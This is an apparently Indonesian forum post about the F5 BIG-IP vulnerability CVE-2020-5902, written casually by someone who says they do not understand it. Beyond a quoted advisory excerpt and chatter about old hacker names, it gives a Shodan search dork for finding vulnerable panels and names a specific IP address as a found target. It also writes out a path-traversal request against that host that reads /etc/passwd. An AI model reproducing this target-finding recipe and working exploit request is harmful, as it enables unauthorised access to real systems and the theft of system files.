Btw ini sempet heboh nih, awal-awal juli kemarin releasenya
pas gue ultah sayangnya gk ada yg ucapin met ultah *eh
kl misal pada langganan newsletter di securityfocus
ini smpet jadi bahasan di milis nya
serius gan ane gak ngerti ini apa, cuma ngerasa keren aja bisa posting beginian
kurang lebih begini lah isinya :
Blockquote to execute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code. This vulnerability may result in complete system compromise. The BIG-IP system in Appliance mode is also vulnerable.
pake shodan ya jangan lupa fufufufu shodan.io
dork nya ini
http.title:“BIG-IP®- Redirect”
(selebihnya bisa baca ini :
https://www.cspshivam.com/post/how-to-find-and-exploit-cve-2020-5902)
terus ketemu ini
https://35.221.124.131:8443
terus gue pake ini :
pake metasploit juga boleh, terus ketemunya ini
https://35.221.124.131:8443/tmui/login.jsp/…;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
dari sini gw udh lupa LFI atw RFD gimana tekniknya
serius gw jadi inget kotom,flyff,ketiak atw bug hunter2 pro nya DC
(dulu si kotom ada remote root xpl nya F5)
kl mereka aktif lg di sini pasti ganteng abis
apalg kl ada tek0,ditatom sama wen collabs create tuls nya
wah yg ashiap ashiap itu mah kalah gokil
lebih lengkapnya baca ini aja gan
terima kasih ya gan